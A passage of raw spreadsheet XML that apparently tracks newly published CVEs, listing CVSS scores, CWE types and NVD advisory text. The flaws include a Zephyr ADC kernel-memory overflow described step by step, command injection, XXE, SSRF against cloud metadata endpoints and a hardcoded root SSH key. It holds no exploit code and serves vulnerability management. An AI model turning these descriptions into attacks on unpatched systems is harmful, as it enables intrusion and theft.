          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>The ADC API requires each driver to reject a sampling sequence whose destination buffer is too small: the buffer_size field of struct adc_sequence in include/zephyr/drivers/adc.h documents that "the driver must ensure that samples are not written beyond the limit and it must return an error if the buffer turns out to be not large enough". The ADI MAX32 driver did not honour that contract. start_read() in drivers/adc/adc_max32.c compared buffer_size, a byte count, against a sample count ((1 + extra_samplings)  channels), ignoring sizeof(uint16_t), so it accepted a buffer half the required size. The samples are then stored through the uint16_t  data-&gt;buffer by Wrap_MXC_ADC_GetData(), which writes two bytes per sample and advances the pointer by one uint16_t: in adc_max32_start_channel() for synchronous reads, and in adc_max32_isr() for asynchronous ones. A sequence selecting two channels with a two-byte buffer, for example, passes the check and has its second sample written past the end of the buffer.
On a build with CONFIG_USERSPACE, adc_read() and adc_read_async() are system calls. The handler in drivers/adc/adc_handlers.c copies the sequence in from user memory, verifies only that [buffer, buffer + buffer_size) is writable by the calling thread, and rejects a user-supplied options-&gt;callback; it deliberately leaves the size arithmetic to the driver. A user-mode thread that has been granted access to a MAX32 ADC device object therefore fully controls channels, buffer, buffer_size and options-&gt;extra_samplings, and can make the driver write twice as many bytes as its buffer holds. Because the check scales with extra_samplings, the overrun equals the length of the buffer itself, up to channels * 65536 bytes past its end, since the sample pointer is only rewound on a repeat sampling, never on the extra samplings of a sequence.
The resulting stores are performed by the driver in kernel mode (in the system call itself, the ADC context timer, or the ADC interrupt handler for asynchronous reads), where the MPU does not restrict the thread's memory domain, so the write walks linearly out of the user partition and into adjacent memory such as other partitions, kernel data or thread stacks. The impact is kernel-memory corruption of attacker-chosen length at an attacker-chosen offset, a plausible privilege-escalation and denial-of-service primitive from an unprivileged user-mode thread. Builds without CONFIG_USERSPACE are affected only as a caller-side robustness defect, since the application itself supplies the buffer.
The fix replaces that check in start_read() with a call to the new shared helper adc_sequence_validate_buffer() in drivers/adc/adc_common.c, passing sizeof(uint16_t) as the sample size. The helper computes active_channels  sizeof(uint16_t)  (1 + extra_samplings) and returns -ENOMEM before any sampling is started.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18414</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4556</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>41c37e40-543d-43a2-b660-2fee83ea851a</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>Exam4 is affected by a local privilege escalation vulnerability in the com.extegrity.LogTool privileged helper, which communicates with the application via XPC. The [ConsoleLogHelper copyConsoleIntoFileFromStartDate:] method executes a syslog command using attacker-controlled parameters without proper sanitization, enabling command injection. Successful exploitation allows a local attacker to execute arbitrary commands with root privileges through LaunchSynchronous.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4556</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45562</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.4 and 17.0.6, the FreePBX Music on Hold (MoH) module contains a critical security flaw that allows authenticated attackers to execute arbitrary system commands with the privileges of the Asterisk service. Authentication with an existing FreePBX administrator account is required. The root cause lies in the fact that the module accepts a POST parameter that defines a custom Asterisk application, which is then stored in the database without any sanitization. Later, this data is written directly to the musiconhold_additional.conf configuration file without validation. Since Asterisk reads this configuration file and executes the specified application, an attacker can inject arbitrary commands that will be executed with Asterisk's permissions. This issue has been patched in versions 16.0.4 and 17.0.6.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45562</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82348</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>Authorization Bypass Through User-Controlled Key in Apache Roller 6.1.5 allows an authenticated user with authoring rights on one weblog to read, modify, or delete resources belonging to another weblog through unscoped identifier-based lookups. This affects multi-user installations where users are intended to be isolated between weblogs; no optional feature or non-default configuration is required. A user with administrator rights on their weblog can also overwrite another weblog's Velocity template, whose content is evaluated when the victim weblog renders. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which scopes authoring resource lookups to the acting weblog.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82348</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82376</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>Improper Restriction of XML External Entity Reference in Apache Roller 6.1.5 allows a user with entry-editing rights on a weblog to cause the server to parse an attacker-influenced trackback response with an XML parser that does not disable external entity resolution, leading to disclosure of files readable by the Roller process. The Trackback control is hidden in the standard UI, but its action remains directly reachable, and no non-default server configuration is required. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes the outbound trackback response parser.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82376</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82379</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Capture-replay in Apache Roller 6.1.5 allows an attacker who captures a valid WSSE digest authentication header to replay it and gain the victim's AtomPub authority, because the authentication does not enforce nonce uniqueness or timestamp freshness. Only installations that enable the non-default AtomPub API with WSSE authentication and plaintext-compatible password storage are affected. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes WSSE as an AtomPub authentication method; existing installations configured for WSSE fail closed until an administrator explicitly selects a supported authentication method.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82379</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82386</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>Improper Restriction of XML External Entity Reference in Apache Roller 6.1.5 allows a weblog administrator to read files readable by the Roller process and reach internal network addresses by importing a crafted OPML document, because the bookmark import parser does not disable external entity resolution. No non-default configuration is required; the import is reached through the administrator bookmark-import action. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which uses a hardened parser that disables external entities and document type declarations.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82386</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82928</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-1242</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module contains a hardcoded SSH public key in /root/.ssh/authorized_keys, serving as a potential backdoor. The SSH daemon allows root login via key authentication and starts automatically. An attacker with the matching private key can gain a root shell on any affected device, resulting in full system compromise. The key cannot be removed without remounting the file system and survives a factory reset. Vendor notes that this functionality was used only for service purposes.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82928</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97335</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in the custom storage volume creation endpoint in Canonical LXD versions 5.0.0 and later (fixed in 5.0.10, 5.21.8 and 6.10) on Linux allows an authenticated client with permission to create custom volumes in a project to copy, and so read, any custom storage volume from any other project on the server, including its snapshots and configuration. The client does this with a crafted request that sets a source volume and source.project but omits source.type.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97335</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101905</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-441</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.15.2 until 1.20.0, the Node HTTP adapter in lib/adapters/http.js supplies request options without an own createConnection value. A separate same-process prototype-pollution flaw places a function on Object.prototype.createConnection. Node resolves and invokes the inherited createConnection socket factory, allowing the attacker-controlled function to select the transport endpoint. The attacker endpoint can receive request headers and bodies, including credentials, and return attacker-controlled responses while the URL appears legitimate. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101905</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55160</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>aws, requests</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Stringer is a self-hosted, anti-social RSS reader. Prior to commit 75cb095, an unrestricted Server-Side Request Forgery (SSRF) vulnerability allows any authenticated user to force the Stringer server to send arbitrary HTTP/HTTPS requests to internal networks, localhost services, and cloud metadata endpoints (e.g. AWS IMDS 169.254.169.254). When self-service signup is enabled (Setting::UserSignup), even a low-privileged registered user can exploit this to scan internal services or steal cloud IAM credentials. This issue has been patched via commit 75cb095.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55160</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100751</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via data-rlta-url attributes in Tabs &amp; Accordions (Pro) 2.3.0 - 3.1.0 - Tabs &amp; Accordions Pro accepts a url option for an item and writes it to a generated data-rlta-url attribute. The browser code passes that value to window.open() when the item is activated. Affected versions do not reject browser URL schemes which execute JavaScript. Joomla sees ordinary plugin syntax while filtering the authored article; Tabs &amp; Accordions creates the executable browser behavior later while rendering the article.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100751</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101878</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>Bitwarden Server 2025.6.0 before 2026.5.0 declares the @ExternalId parameter of the User_ReadBySsoUserOrganizationIdExternalId stored procedure as NVARCHAR(50) while the column it queries stores NVARCHAR(300), silently truncating the SSO login identifier on SQL Server deployments and allowing a user whose identity-provider identifier begins with another organization member's full 50-character identifier to authenticate as that member and obtain a victim-scoped access token.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101878</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102276</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.19, 2.1.5, 3.0.7, and 5.0.10, crafted brace patterns can exhaust the native stack in parseCommaParts because parseCommaParts recursively processes the remainder once per brace group and uses push.apply to pass every element of a very large comma-part array as a function argument. Patterns containing many comma-separated brace groups trigger the recursive path, while the large array triggers the argument-array path without deep recursion. These paths cause recursive and argument-array native stack exhaustion before max or maxLength can limit output, potentially terminating the Node.js process in a process-terminating denial of service. This issue is fixed in versions 1.1.19, 2.1.5, 3.0.7, and 5.0.10.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102276</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102278</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
